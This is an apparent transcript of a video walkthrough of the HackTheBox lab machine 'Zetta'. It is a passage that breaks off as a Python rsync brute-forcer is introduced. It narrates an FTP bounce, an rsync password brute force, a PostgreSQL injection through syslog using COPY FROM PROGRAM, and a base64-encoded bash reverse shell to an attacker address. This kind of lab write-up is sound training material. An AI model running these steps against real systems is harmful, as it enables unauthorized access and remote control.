What's going on YouTube? This is IPSEC, and we're going to be doing Zetta from HackTheBox, which was a really fun box that starts off with doing an FTP Bounce Attack to leak an IPv6 address, and then you scan that IPv6 address and see additional services listing on the box, such as the RSYNC service, that you can do a bunch of cool things to, and eventually upload an SSH key to get on that box. Once you're on the box, you'll notice that RSYSLOG is storing logs in a SQL database and not doing any sanitization. So through syslog, you're going to perform a SQL injection on a Postgres SQL server that allows you to execute commands as root. And because you can execute commands as root through that SQL injection, well, you are root at that point. So a really fun path on the box, and then after all that is done, we'll use Python to build an RSYNC Bruteforcer that utilizes sockets and threading, because we're going to do a brute force to get onto RSYNC to begin with, but a method of brute forcing is going to be really bad and we'll just improve upon it. So with all that being said, let's just jump in. As always, begin with the NMAP, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the NMAP directory and call it Zetta, and then the IP address, which is 10.10.10.156. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open. The first one being FTP on port 21, and is running the software pure FTPD, at least that's what NMAP thinks it is. We don't see any version information or any scripts running for FTP, so there's one I always like testing for, and that is anonymous logins. And NMAP is really good at just giving you information, but it's really bad at telling you bad things or negative things, meaning if it doesn't run a script or a script fails, NMAP doesn't really tell you. I'm sure there's a way to enable debugging, but there's so many scripts that run in NMAP, it's just not easy to manage. So there's always a few things I like testing for if NMAP doesn't tell me, and for FTP that is anonymous login. So I just tried logging in with anonymous, and we get login failed, so nothing really there. However, we do get some key pieces of information. Number one, the banner is telling us the time. It's not a critical leak, but it's always nice to know, especially when it comes to doing some type of crypto, that you can get the server time to make sure your client is synced up to the server. And it can also potentially leak time zones of the server, so if you're doing something on like Tor or something, this can kind of give you a rough geolocation of the server if it's not just set to UTC. The second thing we get is IPv6 connections are also welcome on the server, so definitely let's take a look at both of those things. The other 2 ports that NMAP sees is SSH on port 22, and from the banner we can see it's OpenSSH 7.9 running on Debian 10, and then we also have HTTP on port 80, and that is running Nginx. So real quick, let's just go and make sure our cherry tree has some notes of what we found with FTP, and then we'll check out the web server. Going over to cherry tree, I'm going to press Control-N to create a new node, and we're going to call it Zetta, which is the name of the box, and then Control-Shift-N to create a new child node, to just call it notes, and then we can say FTP, and the very first thing is local time leak, and then the second thing is IPv6 is available, but do not know address. So if you check out the sneaky video that I have on my channel, there's a bunch of different ways we can get this address that are not going to be the way we show. So I definitely recommend doing that if you want to look into some IPv6 things. I do like a 30-minute IPv6 intro in that video, so I just don't want to redo everything when I've already done it once. So let's just check out the website. Going to 10.10.10.156 will reveal the Zetta page. Eventually, once the page decides to load, it's taking quite a while. So it finally loaded, and we can see a relatively pretty site. I'm just going to view the source real quick to see if there's anything that sticks out. Maybe it's WordPress Joomla, and I can recognize it by some JavaScript or something it loads. And looking at it, everything I see so far is HTML, and it doesn't look like a lot of links go anywhere. So maybe it's just a single page layout. Going to the bottom, see if we see anything, but looks relatively basic. We can see the copyright, which is 2019, which is when the box came out. So it looks like it's up to date as well. Looking at everything, we see a lot of just random text. And one of the things that sticks out is native FTP, because this isn't random and it's actually talking about what it says. Like if we look at the Android app, it just goes into gibberish. But FTP says they support FTP with FXP, No idea what this is, and some high number RFC. So let's just take a note of this. Web page, FXP, and RFC 2428. So two things we should look at, and because I always like having some type of recon going on in the background while I work, I'm going to start up a GoBuster on this website. So we're just going to do GoBuster, dir for directory mode, -u URL, and then -w for word list, user share word list, GoBuster, then directory list 23 medium.txt, and save it to the out file of gobuster-root.out. So let's keep going down through the page. FTP storage is done. SFTP, S3, and dual stack isn't there. So SFTP and S3 say 0%. Dual stack says 60%. No idea what that means. Keep going down. We have potential users: Roy Treneman, Jan Barbara, Maurice Moss, and Douglas Renholm, people from the IT crowd. So we can take a note of the users. So users, copy, paste, copy, paste. Whoa. Okay. Jen Barber. And then Maurice Moss. Okay. Maurice Moss. And then Douglas Renholm. So we got some information. If we find like an email of a user, so maybe check Facebook, Google, Twitter, LinkedIn on all these, we could potentially get the username structure. So a lot of companies may use like first initial, last name or something. And if we get one of them, we may be able to leak usernames for all of them. So just nice to get. Don't see anything. Can see their storage amount, and we see use the below credentials on our shiny FTP server to start sharing, and we get username and password for FTP. So I'm going to put on the notes, web page, FTP Creds, and paste that. So that looks like everything. Again, all the links are going nowhere. So let's go check out the FTP server. GoBuster hasn't found anything just yet. So FTP 10.10.10.156. And it takes a little while to get the username prompt. But once it does, we can log in with the username and password. Do a dir on the server. We don't see any files. Add a -a. And we can see the existence of a FTP quota file. So let's try to download it with get.ftp quota. And we see prohibited file name. And if we do a ls, let's do ls-a, we don't have the file. We could try uploading a file. So if we upload test and put test, and then let's try to browse to test, we get a 404 not found. We could try guessing an FTP directory like squiggly FTP or just FTP in general. And if we find the FTP directory, maybe we can upload files to it and get code execution through the web server. Looking back at GoBuster, it hasn't really found anything, so we're still at nothing. I'm going to delete the FTP file we uploaded and then exit out. So when I'm at nothing, I go fall back to doing more recon and then researching. So the recon I want to do is a full port scan, so nmap-p- to do all ports, OA all formats, output to nmap Zetta-all ports, -v to increase the verbosity, just one allows you to see the open ports as it finds it, and then 10.10.10.156. So kicking that off, we can see it discovered 3 ports. We knew about these already. So while it does that, let's just go take a look at our notes. And there's 2 things, FXP and RFC 2428. So let's go research what both of these are. So going over to Google, searching FXP, go to the Wikipedia page, and if you read this, essentially you'll find out that FXP is a way to command 2 FTP servers to transfer a file between each other for the purpose of when your client is on low bandwidth. And this may make more sense when we find a network diagram to explain it, but it does highlight a risk that makes your server vulnerable to a FTP bounce attack. And what this is when you connect it to the FTP server, you issue a port command to tell the FTP server to connect somewhere else. And when it does that, you can do a port scan through that server to enumerate the local internal subnet of it, local ports listing on the box, or maybe just scan a different victim and hide the fact who is scanning. So there's a bunch of various things you can do with it. It's very similar to like open mail relays using SMTP. So let's just add this little note, FXP, FTP Bounce Attack, and then let's go take a look at what RFC 2428 is. Oh, actually, we want to look at the diagram of FXP. So FXP diagram, this one looks fine. Go here, come on, open, view image, and here we go. We have the FXP client in server 1 and server 2. So we're connecting to server 1 and then saying, hey, server 1, expect a file. And server 1 goes, okay, I'm expecting a file on port 49248. So now we connect to the second server and say, hey, we want you to connect somewhere and send a file. And it responds, says, okay, and we told it to connect to server 1 on port 49248. So after it says okay, it makes that connection back to server 1 and they begin the file transfer. So this is very rarely used, but can be useful if like your client is on a low bandwidth link and you wanted to transfer a file between server 1 and server 2 and didn't want to expose any protocol other than FTP. So you may not want to say, hey, I don't want to give them access to SSH because they can run commands, but I also want to allow them to send files between two servers. So kind of a weird niche use case. But that is what FXP is. So let's take a look at RFC 2428. And looking at this, it is an extension for IPv6 and NATs. And essentially, it replaces the port command with eport, so eport space delimiter, netport, delimiter, net address, delimiter, TCP port. And netport, this is 1 or 2. 1 is IPv4, 2 is IPv6. Net address, that is the host name or IP or whatever, and port, you know what that is. So when you combine these two things, you have a way to enumerate the IPv6 address of the server. And that's handy because a lot of times administrators may forget about IPv6 and only apply firewalls to IPv4. So let's do this attack. So let's go over here, make sure the username and password is on my clipboard, and we can do NC 10.10.10.156 to connect to this box. Oh wait, we have to specify the port, so port 21. And it looks like it takes a little while for the prompt to come back, but there we go. So we can log in with user and then the host name, not host name, username, and then pass, and then the password, and we get logged in. So now we can do the eport command, specify IPv6, then we got to give it our IPv6 address. So let's do ifconfig ton0. And our IPv6 address is right here, deadbeef2 1000, and then the port 9001. And before we do this, we should listen on IPv6, so NC-6 LVNP 9001. NCAT doesn't, or NC doesn't support it, but NCAT should. We don't have NCAT, so let's apt install NCAT to install it. And while it's processing, we can just start this listener up. LVNP, we can do -6, I guess. The order of arguments doesn't matter, but start this, and we have a syntax error. Eport delimiter to IPv6 port. So now we told server 1 where server 2 is, and when we do a list, he connects back and runs that command. If there was a file in here, let's do FTP 10.10.10.156, because we deleted that file. It may not make perfect sense. So let's put that file back there, and then this will make much more sense. So log in, put test. Okay, there's now a file there. So let's do that netcat command again. There we go. And do list. I guess we have to do that e-port again. Paste. List. There we go. So he connects and sends the output of that command to server 2. So that is the port bounce and a way to enumerate the IPv6 address of that server. So we can Control-C out of that netcat session, go back here, and we can replace the port on our full port scan with the IPv6 port. And we can also specify -6 to make this an IPv6 scan. And we can do Zetta-all ports IPv6 and let this run. And while it runs, I guess we can take notes at what we did. IPv6 available, combine with FXP to leak IPv6 address. And move this here. Says RFC 2428 capable. There we go. There's some notes. Go back here and we'll just wait for this port scan to finish. And it's been about 5 minutes and we discovered another port we didn't know about, 8730. So what I'm going to do is copy this IP and I'm going to start a second NMAP to identify what 8730 is. So just do nmap-6, the IP address, and we can do -sv-p 8730. So this will just enumerate versions, and we see it says it is RSYNC. And we can confirm that with probably just doing a netcat on that. So if we netcat-6, paste this in, 8730, we connect, and we see it's RSYNCD, specifically version 31. So if we just try the command, RSYNC, and then the IP address, :8730, and when it comes to IPv6, generally put the IP address in quotes, and we can do -list -only to list files. Sure, and it wants a password. Maybe we specify rsync://. There we go. Since this is plain text, by default, it was trying to do SSH. If we do SSH-6-P 8730 and paste this in, does it connect? Key exchange -v. Let's see, it's trying and looks like it just doesn't accept SSH at all. Okay. So list only will list files. You may want to specify -a, just like FTP, list all files, and we can see various directories. So we can try them. This looks like the root of a web server or a Linux server, and we get access denied for these directories if we try to list them. We can try listing some even though they aren't here, like Etsy, and when we do, we get a list of directories. So it's odd, we don't have Etsy listed here, but when we do it, we get it. So the other directory I'm going to try is /home, and it doesn't work. So I'm going to do Etsy, and we're going to rsync it to the directory rsync/Etsy. I'm going to make dir-p rsync/Etsy, get rid of this list only. And now, in this directory, we're starting to get files. If you added the -v for verbose, it will show you the files as it has copying. And if you don't know rsync, you could always just man rsync, and that's how you'd learn the lingo or whatever. So like list only's there. If you do -a, you can see things. But command is finished. So let's go poke in the server's Etsy directory. So cd rsync. cd Etsy. The key thing I want to look at is file dates. So it did preserve them. So we can see server was very active July 27th. UFW, that's the firewall. So applications.d, we can cat this to see the configuration. cat open SSH. Let's see, is there any IP table stuff? Find.grep IP table. We can see IP tables, cat rules.v4. And we can see all the rules they have on the server to see how they're configured. Looking at it, I don't really see any vulnerabilities. Kind of odd that it has routable IP addresses here, but other than that, nothing too interesting. We look at IPv6 and it's completely empty. So that's why we could scan this server on IPv6, because forgot to apply the v4 rules to v6, and it's relatively common. Again, check out the sneaky video for a lot more stuff on IPv6. More importantly, I'm kind of curious about the RSYNC configuration. So I'm going to do we could also, actually, before I do that, look at passwd, get users on the box. We got a Postgres user, Roy. So usernames in the context of just username or first name. But that's it. The other users didn't have valid usernames, only Roy. So if we cat shadow, probably didn't pull it. Yeah, we can't even see the shadow file. So let's less RSYNCD.CONF for config, and we can see exactly how it's configured. So bin only allows this host, boot only allows this host, etc. Temporarily disable access to etc for security reasons, and we see it only allows a local host and denies on all of IPv4. And this is kind of weird. My guess at how RSYNC is working is it probably puts a allow and then deny all. So if you configure an allow, it will allow that host, and if the host is on that, it's good. If you don't allow anything, there's probably no deny all. But if you put a deny in here, it's going to remove that deny all and turn it into a deny IP address. And this allow puts an IP address here, but because it changed that bottom rule, which was a deny, the deny all is not there. And since it's only specifying IPv4, that's why we can list it over IPv6, is my guess. So that deny is probably changing a blanket deny all statement in the source code. I haven't confirmed that, but that's my hunch at exactly what's happening. So if you want to allow only specific host, probably don't try putting a deny statement in, because it could lead to what we're seeing here. List equals false is hiding the directory from view, and we also have it with an exclude.get. So this is interesting. Let's put notes, rsync .get directories excluded, and list equals false /etc config. So let's keep going down this config, lib64, opt, whatever, all the same thing. And then we get to home Roy, and this is read write, since read only is set to no. User ID is Roy, GID is Roy, users is Roy, secrets files RSYNCD.SECRETS, and list is false. So do that, and let's search for that file in this config. Doesn't exist, so let's try downloading it. Where is the rsync command? Oh, it was in a different window. If I do this, do I have it? There we go. Oh, I downloaded the whole etc directory. So we should be able to cat RSYNCD.SECRETS. No such file or directory. If we rsync this and do the list only, -a, let's do verbose, list only. To list all the files, we can list, look through a thing for rsync. And if we go through this, we have message of the day, conf, but no secrets. So if we specifically list for this file, etc RSYNCD.SECRETS, we can see it. And if we try downloading it, so if we just put period to try downloading, we get a permission denied. Let's try listing etc shadow. So we can list the files specifically, but we can't download them. The one interesting thing that we have leaked right here is the file size. So if we do etc RSYNCD.SECRETS, and let's do -Q for quiet mode, so I think it hides the message of the day. I guess I can't do -AV list only. Oh, yeah, list only is probably hiding it. But anyways, it gives you the file size. So rsync.d is 13 bytes big. And if we look at RSYNC secrets, the actual format of this file, we'll see that it expects plain text credentials. Let's see, RSYNCD.CONF with secrets. Okay, so this is what it expects. Username, password. So knowing the username is Roy, that is going to be Roy, password. In order to get that file size to be 13, the password's either 8 characters or 9 characters. So it could be Roy, 9 characters, and 4 plus 9 is equal to 13. Or it could be Roy, 8, and then a line break. So I'm going to guess the password is 8 characters or 9 characters. So let's build a word list. I'm going to do egrep for extended grep. This allows me to do regular expressions. And we're going to specify starts with some type of character, 8, 9 for 8 or 9 characters, and then $ for end. And then we'll do user share word list, RockYou.txt. And we can see we're only grabbing all the 8 or 9 character passwords out of RockYou. I'm going to pipe that to wordlist.txt. So we're shrinking the word list from, let's see, wc-l, wordlist.txt. RockYou is this big, and we shrunk it to this amount, which is still a pretty large number, but well below half of that, so it should speed up the attack quite a bit. So now we can do a brute force, and rsync supports passwords and a variable. So how this is going to work, we're going to do a shell script first, and at the end of the video, we're actually going to code a cool Python script to do this and make it threaded. But that'll probably take like a half hour, and I don't want to make you sit through that if you don't want to. So at the end, we'll have a little Python coding session. So let's vi brute.sh, and we'll do for pass in cat wordlist.txt, do export rsync password is equal to pass, and then rsync-q, rsync roy at, I forgot what the IP address was, so let's grab it. So if we can just run this whole command. There we go. Paste this, and then home Roy. We can do -- list only, and we can hide all error messages. And then we can do a if the exit code of that last command is equal to 0, then it completed successfully. So we will echo pass is equal to pass, and then break to exit out. And then to exit that, we just do a fi, and we can end the loop. And I'm also going to echo this so we know what attempt just happened. That may be good bash. I'm horrible at bash scripting. Looking at this, we have 2 things here. And we erased his username. Okay. Let me make sure that's his correct home directory. Let's go to the bottom. And the directory is home_Roy. That's good. So I think we are good. So if we execute brute.sh, we should just see a bunch of probably ones. Oh God. Something bad's happening. Control C. Dev null, no file directory. /dev null. Missed that one. Okay. So all the exit code is doing, so if we go... Oh, we're getting a lot of zeros. Oh. There we go. Passes computer. So what that did was essentially, I think if I put this echo up here, so we'll try this with a bad password. This is how we'll explain it. So we'll export rsync_password is equal to please subscribe. So now we have the password in our environment, and then we run this command. And echo this, we get 5 because the command failed. The same thing with if we cat a file, if we cat test and echo this, it's 0. But if we cat a file that doesn't exist, like support me on Patreon, because by the numbers, if you're watching this, chances are you don't. But if we echo this, it's 1 because the command failed. So that gets the exit code of the last command that was ran. The reason why we got a bunch of zeros is because we're getting the exit command of this if statement. So I did that one poorly. But we saw it exited with computer. And once it did that, that was the password. So chances are, if we do... I thought I just killed that whole... What did I remove from my script? Oh, I just removed the exit code. There we go. But if we export the rsync password to be computer, and then run the same command, the home Roy thing, we don't get an error message. Before, we did. So definitely have something. We just can't view any files. So I'm going to add the -a to see what happens, to do all. We don't get anything. AV for verbose. Don't get anything. Let's try homeroy /. I'm not sure why we're not getting anything. Let's get rid of this queue. Okay. For some reason, the queue was suppressing the output of the files. I'm not an rsync expert, but there we go. We got a bunch of files. So let's make dir rsync home Roy and rsync all the files there. So we'll do that to rsync home Roy, and we'll specify -av so to copy all files, and then verbose so we can list them as we get them. So if we go into etc or rsync home Roy, we can see we downloaded all the files. His bash history is set to nothing. There's the user.txt, which is the flag. And we got .todo.xml. So if we look at this, let's just do it in Vim. Vim to do. We can see an XML file. Done yes. So I'm going to ignore done yes. I'm just going to search for done equals no. Add more contents to the homepage. We don't care about that. Screenshots to mobile apps, don't care, don't care. This is on the server. HTTP, done no. Let's see. Testing, they didn't test it. They don't have HTTPS, and they don't have any monitoring. Let's look at the next thing. Network. Test IPv6, yes. Add IP6 table rules, nope. Check IPv4 specific service, they haven't. FTP testing. Testing, monitoring, no. RSYNC. Rework RSYNCD.CONF because of security incident. Enable, whatnot. syslog server. So this is kind of going through a checklist of what's on the server. So that to do was TODO for to do. Compare syslog versus RSYSLOG. Both of those are just syslog daemons. Test none. Rework syslog to push all events to DB. So that's interesting. We can do notes syslog events to DB. Normally syslog doesn't store events directly in a database. It's normally like file or Splunk or something. Read write GUI for syslog DB access view. So they want to make the syslog a web page, it looks like. So maybe it's in progress or something. Security, run lynis and remediate findings. So they haven't really done a Linux enumeration script. Change password scheme from secret at username to something more secure. So chances are the password is password at user ID. So maybe Roy's password is computer at Roy. So we can try logging in with that. And that's the end. So notes pw scheme user at pw at username. So let's try SSH Roy at 10.10.10.156. I'm going to try the username password computer at Roy. And we don't get in. So if we remember back to the configuration file, this directory was read write. So what I'm going to do is make dir SSH. We'll go into this, and I'm going to do SSH-keygen, and we're going to just create IDRSA, sure, empty passphrase. I'm going to move IDRSA.pub to authorized keys. I'm going to chown 1000 to IDRS to everything. And chmod 600 everything. I actually have that user. Maybe I have the user on my box. Cat etsy passwd. grep 1000. I don't have that user on my box. So turns out you can set the UID if you don't have the user. Interesting. But I just did that so if rsync preserves permissions, then it will preserve them when it copies it up. So I'm going to man rsync, search for preserve to see if there's a flag. Preserve herd links -p. So we'll make sure we do the -p because SSH is very picky about permissions. So now we can do we'll do rsync password equals computer. It should still be my environment variable, but I'm just putting it here. Rsync : we gotta do rsync.ssh. We can do -apv Roy at what's the IP address? Cat this, and we will paste. Okay. So we sent the files. So if we do ssh-i.ssh idrsa Roy at 10.10.10.156, it still asks us. If we do list only, let's look at what's going on. Oh, we did the copy wrong. It didn't copy the directory. It only copied the keys. So there's no .sh directory. So let's go up one directory and rsync the files. There we go. We'll try it this way. Rsync the directory, home Roy. There we go. So we sent this, so now it synced the files. I bet if we did this SSH command again and didn't put this slash, it would have copied the directory. But because we put this trailing slash, it thought we wanted to copy the files inside this directory and only sent that and not the directory structure. That's my guess at what just happened there. Let's specify where this is now, homeroy /.ssh, and we're finally on this box. So we can do sudo-l and we get command not found. Let's clean up authorized keys in IDRSA since they should be in that .sh directory that we created. So on this box, what can we do? I guess we can run a Linux script, and this to do said to run a script I'm not familiar with. So Linus, was it Linus? Server, no, let's look at what it said. Monitoring, where is it? Run Linus, Lynis. So GitHub, Lynis, security auditing for Linux. Good God, this is big. ly, do we have this on the server? Locate lynis, locate not found, find / to dev null grep-i lynis. I know find has the -name thing, but I like doing grep just because I know the syntax and I can make a case insensitive pretty easy. The script's not there. Does this have a release? 48 releases. Come on, please be just one bash script or an executable I can run. Only the source code. I haven't actually ran the script before, I think. Git clone, cd. Okay, this should be relatively easy. Let's just try this. Let's do cd opt, git clone, script, and we can do cd home / boxes or HTTP boxes Zetta, rsync etc.sh, no, rsync homeroy.sh, SCP-I, IDRSA, Roy at 10.10.10.156, and we want to send it the file, a directory opt, Linus, there we go, and we need a colon. So now it's sending the directory. Oh, that's going to be slow. Let's just tar this up. tar-cjvf linus.tar. I think that's bz2 opt linus. Okay, scp this file. There we go. That's going to be much faster. tar zxvf or xjvf lynis.tar.bz2. Sweet, we got the script, and it wants us to cd into it. We did /linus audit system. Audit system. Enter. Can't open. Change ownership functions to root or similar. So I'm just not going to run the script. So I'm not sure exactly what it wants us to do, but looks like this wants to be owned by root for it to work. So we'll ignore that step in the to-do, and instead we'll supplement it with their own Linux script, and that's going to be privilege escalation scripts awesome suite, and we can do LinPEAS, and then Python-m simple HTTP server. I know this is Python 2, and I guess we can do Python 3 because it is 2020. Python3-m HTTP.server. There we go. That'll probably make one person happy. Curl 10.10.14.2, which is my IP, 8000. LinPEAS.sh, pipe it to bash. Curl not found. Do we have wget? Wget not found. NC not found. Oh man, let's just SCP this file. SCP LinPEAS to Roy at 10.10.10.156, and we can specify the key at home HTTP boxes Zetta and .sh. No, rsync homeroy.sh idrsa. Bash LinPEAS, and now we're finally running it. So we'll let the script run and then look over exactly what it found. So now that it's done, let's just look at it. I'm searching back for the syntax, and then we can just go through this. Let's see. Ping's available. The kernel, I'm guessing, yeah, 2019, July 19th. Relatively recent, probably not a kernel provask. Writable path, system stats, environment. I'm just scrolling down and looking for red or colors. When unexpected processes run by root, for some reason, I'm guessing maybe it thinks Roy is root. I don't know exactly what it's doing here. Cron jobs, not interesting. Did we have groups? Did this put groups up at first? I'm used to seeing a group. We can search for it after. That just didn't highlight. Okay, we'll keep going. Available software, cron tab. This is outdated versions of software, network information. We got the host name in the box, of course. We could have just done host name. IP address, IP tables, active ports. Can we sniff with TCP dump? So that's probably checking Linux capabilities and things. And there we go. My user. We are Roy. We're a member of admin, so we can read logs, CD-ROM, whatever. Video, I think we can actually get a picture of what standard out on the server is. PGP keys, clipboard, super user in the box, users with console, logins, users, password policy. I think it's grepping for password stuff here. We've got Postgres on the box, config files. We can probably view this file now, RSYNCD.SECRETS, but we know what its contents are. It's probably Roy:computer. NFS exports, again, just looking at the red things for anything that sticks out. And we don't have anything that stuck out through a quick glance. I put something in my clipboard. Oh, RSYNC secrets. If we cat that, I guess we can't. I guess we have to be root. Yep, only root can read that. I guess if Roy could read that, then we probably could have just downloaded it. I don't know. So the next thing I do probably, let's look at when user.txt was created, July 27th. So I'm just going to do find/etsy-newermt, and then we'll do 2019-07-27, and then not a newermt of 2019-07-28. And there's a lot of files in Etsy that are modified at that time. So let's see, can we do timestamps? Let's say 0500, and we'll say, instead of 20 that, I'm just looking at files on the box. So doing a little bit of incident response type thing. So file between these two dates, is that going to work? Sweet, I think we got less instance. So to devnull. So we can see RSYSLOG.d, pure FTPD, and that may be about it. So doing that and putting it to that time frame took it down to 38 lines, and before specifying the hour the flag was created and just doing the day, we had 1,000 things. So always searching boxes based upon time frames can give some help. So we got, okay, FTP, Postgres, and RSYSLOG. So let's take a look at Etsy, pure FTPD. And we got a config, database, and .git. So we go DB, LSLA. We got auth. Now let's see. Cat conf 10 xauth. I don't know exactly how this is doing authentication. Grep. Okay, paste and search all files. Grep-r. I was trying to find where it's specifying usernames and passwords to try to dump it. I don't know. I guess we can do git log-p to view changes of this, because there is a git directory. So this will show us, I guess, them configuring it. I'm guessing it's that xauth thing. But conf. It's got to be auth. Cat var run FTP. Nope. Cat 65 Unix. No. 70 PAM. No. Yeah, I'm not sure exactly how they're specifying the username. But didn't look like anything there. Let's go back to the find command. Next one is Postgres. So cd Postgres, git log-p 11. Okay, we don't have a git directory here, but we have a Postgres ident.conf and permission denied, Postgres.conf, grep-i user. Doesn't look like it. I'm guessing the password for this is probably in the ident.conf file. So can't really get passwords out of Postgres. Let's go back to this find and see what else we have. We do have our syslog.d, pgsql.conf, less pgsql.conf, permission denied, but there is a git directory, so we can do git log-p, and we can see things. So they remove this line, localhost, syslog, UID RSYSLOG, no password. Let's see. So they're adding a template, constant, insert into syslog lines, message, values, and so right here they are inserting a syslog entry into a database. It doesn't look like they have any type of escapes or anything. And load OMPG SQL. If we search our syslog this, we get Postgres SQL output. So the logging stuff to a Postgres database. And there we go. Local7.info, which is a log level. Type Postgres, localhost, user Postgres, password test1234. So that looks good. Let's go back here. Notes, Postgres, pass1234, or test1234. Okay. Keep going down, and there's nothing else. So I'm going to do SSLNPT to view open ports. Postgres 5432. So let's go take a look at that. We can do. It's weird. It's listening on IPv6 on that, but our NMAP did not see that. So something blocked that. Unique. But we can get on it on localhost. So let's go HTTP boxes, Zetta, RSYNC, Roy home Roy.sh. And I'm going to do SSH-L 5432. So it's going to listen on port 5432 of my box, forward it through SSH, and end up on localhost 5432. Roy 10.10.10.156, I think is the IP. We have to specify -i IDRSA. If you're ever confused about port forwarding, check out the video REDDISH, Reddish, because this explains port forwarding in great detail. But now that we have that port open, I should be able to do pgsql-h for hostname, localhost, psql, okay, localhost. Oh, did we have psql in this box? I did. God darn it. I'm not used to having utilities. Let's see. psql-u Postgres -capital U Postgres -p -u Postgres. Different behavior on these two things. Maybe if I did psql-h localhost-u Postgres. Okay, yeah. So we didn't have to forward the port. I just jumped the gun there. But when we try logging in, we get password failure. So that doesn't really help us. However, we do know something. It is logging into Postgres, syslog lines, message, device reported time, and values. So in Postgres, there is a table called syslog lines, and the column message and device reported time. And that's doing values, single quote, and then doing a property MSG. So this is going to be the syslog message. And then single quote, comma, single quote, property, time reported, date format, whatever. So right here, we can probably control this MSG line by injecting invalid SQL commands. And we should be able to view any log in var log because we are a member of the ADM group. So if you do LSLA here, a lot of logs are readable by ADM. So I can do find.-readable and look at the logs. Postgres has a log that's readable. So if we're trying to inject, reading logs out of Postgres sounds like it would be really nice. So if we do logger-p local 7, I think, .info test, and we put a single quote, we get an error message. So in this error message, we see insert into syslog lines, values, test, and then the single quote killed it. Oddly enough, looks like it's kind of escaped, but not escaped because it still caused an error. But that stopped it from working. So if we try this and then we do a parenthesis, -- space -- it still failed. So let's see. Value. We can do test, comma test. We're trying to get it to not error, which may be more difficult than it's worth. I think we have the ability to just do stacked queries. So we may just live with getting error messages, but instead do a stacked query with just semicolon. So maybe select stir from syslog lines. Does that work? Test. Maybe. I guess we can just try like making Postgres ping us. So Postgres, I think command output may help us ping. Command output. Postgres, I think it was in 9.3 they added ability to run commands. So 9.3 command, execution. There we go. Medium, running commands on Postgres 9.3. Let's see. Drop table if table exists, create table, copy cmd exec from program ID. So what we can do, that single quote and drop table if exists, please subscribe, and then create table, please subscribe, cmd output is text. So we just created that table and we copy please subscribe. I just replaced wherever cmd exec was with please subscribe and noticed how complicated that may have made things. From program ID. From as a capital program ping 10.10.14.2. We want to do -n1 and comma -- and tcp dump -i ton0 icmp. Let's try this. We didn't get a ping, and we can see it's escaping our single quotes, which may be causing an error. And Postgres has something weird with a double dollar being a single quote. So this is just a weird Postgres thing of it having a different way to escape this. Can't find a good posting. Oh, I probably should say Postgres. There we go. The lexical structure. Let's see. Update, that's not it. Insert text, dollar quoting. So it's got this weird thing. So if you wanted to have quotes in your SQL statement, you can use $$ as a different way to do a quote. So what we're going to do is replace our single quote with $$. And in order for bash not to process it, I'm going to escape the first $, because otherwise it would think it's a variable. So do this. And we still don't get anything. So we probably have a weird error message in our SQL statement. So let's review it. Easiest way to do this is copy this whole line, go to a new pane, v output, paste, and we want to put our command here and copy this, paste, cmd. So let's take a look at this. Insert into syslog line values test. So right here, it is going to definitely fail because we're inserting two things into this. And the reason why I had not bothered trying to do doubles is because of how it's escaping these single quotes. Meaning, like, if I did comma, / this, like, I still think that's a syntax error. If I could put straight quotes, I could easily make this one work. So that is the issue I think we are running into, because I think this sequence is correct. So let's see, create table, copy from program, like that. And then we commented out everything else. So let's see. What could we have possibly messed up on? I guess we could try putting null. Sometimes null gets evaluated specially. So let's try test, comma, null to tell the database it's nothing. Because sometimes you don't need to say what nothing is. And we still got an error message. Let's see. What if we do that? Still doesn't like it. If we remove everything and just work with what we have, make sure the error isn't coming out of the other stuff. So there we go. So doing this did fix it because we're no longer erroring. We're now running that well. So let's run this again and see if it tells us what the error message is. Let's see, insert into that, drop table if exists, please subscribe, create table. Doesn't tell us what the error message is. So let's run one of those commands. So drop table if exists, please subscribe. And end it with a single quote. So it's not erroring there. So create table. Can we create table? We can. So it's erroring when we do our actual command. So this copy, please subscribe from program. Let's go back to this. Copy from program. Let's just do ID instead of ping. ID. So it's not erroring. It errors on ping. Ping -n1 10 10 14 2 is where it has heartburn. But looks like we can run ID just fine. So that's weird. Can we do commands with a space? So if I do echo who am I, doesn't error. Can I use, I probably can't use quotes because I'm using quotes earlier. I guess maybe I can do escapes. Okay. Let's add a dash. Just doesn't like ping. Weird. Let's try creating a file on the server. So let's do cd temp v ipsec.sh bin bash ping 10 10 14 2. And let's make sure that's, oh shoot, man ping. I think I know what it is. Yeah. I was doing a Windows box before this box, and I screwed up my stupid ping argument. That's why I normally test ping before I actually run it. So let's go back to this ping. Instead of -n, because n is the Windows flag, we'll do -c. And there we go. That's what it was. So now we have a way to verify we have code execution. Let's go all the way back. Did we even need that null? Was all this troubleshooting for nothing? So here we are. -c1. So that troubleshooting wasn't for nothing because we needed to fix this null thing for that to work, but would have saved a few minutes. So now let's get a reverse shell. Echo ping -n1 -c1 10 10 14 2 pipe that to bash. Can we do it this way? Yes, we can. So the reason why I tested that is this confirmed we can now do base 64. So we can do echo-n, and we can do echo-n bash-i 0 and 1 dev tcp 10.10.14.2 9001. 0 and 1. That's the syntax we want for the reverse shell, and we can base 64 encode that. NC LVNP 9001. Paste that in. Base 64-D bash. And run this. And now we have a shell as the Postgres user. So with this, I guess we can do a lsla. And we can see the Postgres SQL history. And we also see .ssh. So we could cat.ssh or ls.ssh and get the RSA key and authorized keys. So we could SSH into the box as Postgres if we really wanted to. But let's take a look at that PSQL history. And we have information. So we have alter user Postgres with password this. So we have the password for Postgres. So let's go psql-h localhost-u Postgres, paste the password, and now we can get in. So we could try select star. Let's see, how do we dump users in Postgres? Postgres SQL cheat sheet. Pen test monkey. I know like MySQL, you do select star from I think mysql.auth. Postgres, let's see how we dump users. Current user, list users. Select username from PG user. And we only got one user, and that is Postgres. So I was hoping for a root user that we could crack the password. Let's see. How do we list databases? Select data name from PG database. Okay, so we got template 0 and template 1 and syslog. So we can we describe or use syslog? I really don't know Postgres. We could try going through this and enumerating Postgres, but we can also try one other thing. Let's exit this. And the site said the password scheme was password at username. So let's try super secret pass at root. So su dash, paste this at r00, not 00, OOT. And that was it. So password reuse gets us in. wc-c root.txt 33 in a line break. So that is the box. But I promised you something cool, and I haven't actually done it or got it working. Just something I wanted to do, and that was create a RSYNC Bruteforcer, because the ones on the internet, like Hydra and stuff, either don't support RSYNC or don't support IPv6. So let's do this and make a fun experiment out of it. Can we do this easily? So make dir code, cd code, and here's where we will begin. We're going to create 3 different programs. The first one's probably going to take the longest. It's going to be our RSYNC login example, because we have to kind of reverse how RSYNC works. The second one is just going to be a Python threading example. And the third one, we're going to combine the two, so we have a Bruteforcer that supports multiple threads, so hopefully 